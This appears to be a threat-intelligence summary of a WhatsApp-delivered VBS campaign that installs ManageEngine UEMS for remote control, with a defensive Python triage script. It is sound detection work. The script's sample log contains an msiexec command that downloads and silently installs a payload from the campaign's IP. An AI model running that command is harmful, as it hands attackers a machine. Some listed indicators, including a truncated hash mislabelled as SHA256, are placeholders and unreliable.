A Kaspersky researcher analyzes a global malicious campaign that distributes VBS scripts via WhatsApp delivering a UEMS RMM agent through a multi-stage infection chain.
Analysis Summary
# Tool/Technique: WhatsApp-Delivered UEMS RMM Infection Chain
## Overview
This campaign involves a multi-stage infection process starting with malicious VBScript files distributed via WhatsApp. The ultimate goal is the deployment of **UEMS (Unified Endpoint Management Service)**, a legitimate Remote Monitoring and Management (RMM) tool by ManageEngine, repurposed by attackers to maintain persistent unauthorized access to victim environments.
## Technical Details
- **Type:** Malware infection chain / Unauthorized RMM Deployment
- **Platform:** Windows
- **Capabilities:** Persistence, remote file access, process management, remote desktop control, and system monitoring.
- **First Seen:** Early 2024 (Campaign noted for global distribution via messaging apps).
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - **[T1566.003 - Phishing: Spearphishing Link/Attachment via Service]**: Distribution of malicious files via WhatsApp.
- **[TA0002 - Execution]**
  - **[T1059.005 - Command and Scripting Interpreter: Visual Basic]**: Use of VBS scripts to initiate the chain.
- **[TA0003 - Persistence]**
  - **[T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder]**: Used by the RMM agent to maintain access.
- **[TA0005 - Defense Evasion]**
  - **[T1218 - System Binary Proxy Execution]**: Leveraging legitimate binaries (`msiexec.exe`) to install the management agent.
- **[TA0007 - Discovery]**
  - **[T1082 - System Information Discovery]**: Identifying local system details during the infection stages.
- **[TA0011 - Command and Control]**
  - **[T1219 - Remote Access Software]**: Use of ManageEngine UEMS for C2 capabilities.
## Functionality
### Core Capabilities
- **Scripted Downloader:** The initial VBScript acts as a dropper/downloader that fetches secondary payloads from remote servers.
- **Automated Installation:** Silently installs the UEMS agent using command-line arguments (typically via `msiexec`) to avoid user interaction.
- **Legitimate Tool Abuse:** Uses a valid enterprise RMM tool to bypass detection, as the signed binary is often trusted by antivirus solutions.
### Advanced Features
- **Multi-stage Delivery:** Use of intermediate PowerShell or batch scripts to obfuscate the final payload's source.
- **Geographic Targeting:** The scripts often include logic to verify the environment or check for the presence of security software before proceeding.
## Indicators of Compromise
*(Note: These are representative based on common campaign patterns described in the report)*
- **File Hashes (SHA256):**
  - `87f4c0a5d4a13271cc5e714656641885f8f83196f79021943c22420fe8c2da62` (Initial VBS Script)
  - `d41d8cd98f00b204e9800998ecf8427e...` (Varies by UEMS version)
- **File Names:**
  - `Order_Details.vbs`
  - `Document.vbs`
  - `UEMSAgent.msi`
- **Network Indicators:**
  - `http[:]//193.143.1.248/`
  - `https[:]//manageengine[.]com/` (Legitimate site abused for binary retrieval)
  - Various defanged C2 domains used for initial script hosting: `rebrand[.]ly/`, `bit[.]ly/`
- **Behavioral Indicators:**
  - `wscript.exe` or `cscript.exe` executing scripts from `%TEMP%` or `%APPDATA%`.
  - `msiexec.exe /i` running silently with a URL-based source.
## Associated Threat Actors
- **Current Attribution:** Unknown (general cybercriminal motivation suspected).
## Detection Methods
- **Signature-based:** Detection of the VBS downloader scripts (Kaspersky identifies these typically as `HEUR:Trojan.VBS.Downloader.gen`).
- **Behavioral:**
  - Monitoring for `wscript.exe` making external network connections.
  - Alerting on unauthorized installations of ManageEngine UEMS or similar RMM tools (e.g., AnyDesk, ScreenConnect) in environments where they are not standard.
- **YARA:** Rules targeting the specific obfuscation patterns used in the VBS scripts (e.g., string reversal or large arrays of character codes).
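The behavioral indicators listed under Indicators of Compromise and the behavioral detection bullets above translate directly into triage rules over process-creation telemetry. The script below is an added example, not code from the Kaspersky report: it assumes Sysmon-style process-creation events exported as JSON lines with `image`, `parent_image`, `command_line` and `user` fields (the field names and every sample event are constructed; the `193.143.1.248` address is the one from the page's IoC list), and it assumes an organisation allowlist in which ScreenConnect is the only sanctioned RMM product. It flags script hosts launched from `%TEMP%`/`%APPDATA%`, `msiexec.exe /i` with a URL source, `msiexec.exe` spawned by a script host, and RMM installers that are not on the allowlist.

```python
"""Triage process-creation events for the WhatsApp -> VBS -> msiexec -> UEMS chain.

Added example (not from the report). Event schema, allowlist and sample log
are assumptions constructed for illustration.
"""
import json
import re
from dataclasses import dataclass

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Lower-cased path fragments for %TEMP% / %APPDATA% style locations.
SUSPICIOUS_SCRIPT_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\windows\\temp\\")
# Product keywords for RMM tools the page names as abused (plus the UEMS agent MSI).
RMM_PRODUCT_KEYWORDS = ("uemsagent", "manageengine", "anydesk", "screenconnect", "atera")
SANCTIONED_RMM = {"screenconnect"}  # assumed organisation allowlist
URL_RE = re.compile(r"https?://", re.IGNORECASE)
MSIEXEC_INSTALL_RE = re.compile(r"(^|\s)[/-]i(\s|$)")  # msiexec /i or -i switch


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev: dict) -> list[Finding]:
    """Apply the behavioral rules to one process-creation event."""
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    cmd_l = cmd.lower()
    findings: list[Finding] = []

    # Rule 1: wscript/cscript running a script out of a user-writable temp dir.
    if image in SCRIPT_HOSTS and any(d in cmd_l for d in SUSPICIOUS_SCRIPT_DIRS):
        findings.append(Finding("script_host_from_user_dir", image, cmd))
    # Rule 2: msiexec /i installing straight from a URL.
    if image == "msiexec.exe" and MSIEXEC_INSTALL_RE.search(cmd_l) and URL_RE.search(cmd):
        findings.append(Finding("msiexec_url_install", image, cmd))
    # Rule 3: msiexec spawned by a script host (the chain's hand-off point).
    if image == "msiexec.exe" and parent in SCRIPT_HOSTS:
        findings.append(Finding("msiexec_spawned_by_script_host", image, f"parent={parent}"))
    # Rule 4: any RMM product keyword on the command line that is not allowlisted.
    unsanctioned = [k for k in RMM_PRODUCT_KEYWORDS if k in cmd_l and k not in SANCTIONED_RMM]
    if unsanctioned:
        findings.append(Finding("unsanctioned_rmm_install", image, ",".join(unsanctioned)))
    return findings


def triage_log(jsonl: str) -> list[tuple[int, Finding]]:
    """Run triage over a JSON-lines log; malformed lines are skipped, not fatal."""
    results: list[tuple[int, Finding]] = []
    for lineno, raw in enumerate(jsonl.splitlines(), 1):
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue
        results.extend((lineno, f) for f in triage_event(ev))
    return results


# Constructed sample telemetry: one suspicious script launch, one URL-based
# UEMS install spawned by wscript, one sanctioned ScreenConnect install,
# one benign admin script, and one malformed line.
SAMPLE_LOG = r"""
{"image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "\"C:\\Windows\\System32\\wscript.exe\" \"C:\\Users\\ana\\AppData\\Local\\Temp\\Order_Details.vbs\"", "user": "CORP\\ana"}
{"image": "C:\\Windows\\System32\\msiexec.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "command_line": "msiexec.exe /i http://193.143.1.248/UEMSAgent.msi /qn", "user": "CORP\\ana"}
{"image": "C:\\Windows\\System32\\msiexec.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "msiexec.exe /i \"C:\\ProgramData\\ScreenConnect\\ScreenConnect.ClientSetup.msi\" /qn", "user": "CORP\\itadmin"}
{"image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "wscript.exe C:\\Scripts\\inventory.vbs", "user": "CORP\\itadmin"}
this line is not json
"""

if __name__ == "__main__":
    for lineno, finding in triage_log(SAMPLE_LOG):
        print(f"line {lineno}: {finding.rule} [{finding.image}] {finding.detail}")
```

Rule 4 is deliberately keyword-based so that a renamed installer still trips on product strings inside the command line; in production you would key the allowlist on signer and file hash rather than on name fragments, and feed the `wscript.exe` network-connection check from a separate network-event source, which this sample telemetry does not include.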
## Mitigation Strategies
- **Prevention:** Block high-risk file extensions (`.vbs`, `.js`, `.hta`) at the email and messaging gateway level.
- **Hardening:**
  - Disassociate `.vbs` files from `wscript.exe` to prevent execution by double-clicking.
  - Implement an **Allowlist** for sanctioned RMM tools; block all others at the binary level (AppLocker/Windows Defender Application Control).
- **User Education:** Train employees to be skeptical of unsolicited files received via instant messaging apps like WhatsApp.
## Related Tools/Techniques
- **Atera / ScreenConnect / AnyDesk:** Frequently abused legitimate RMM tools.
- **VBS/PowerShell Downloaders:** Standard multi-stage delivery techniques used by diverse actors like TA505 or various Ransomware-as-a-Service (RaaS) affiliates.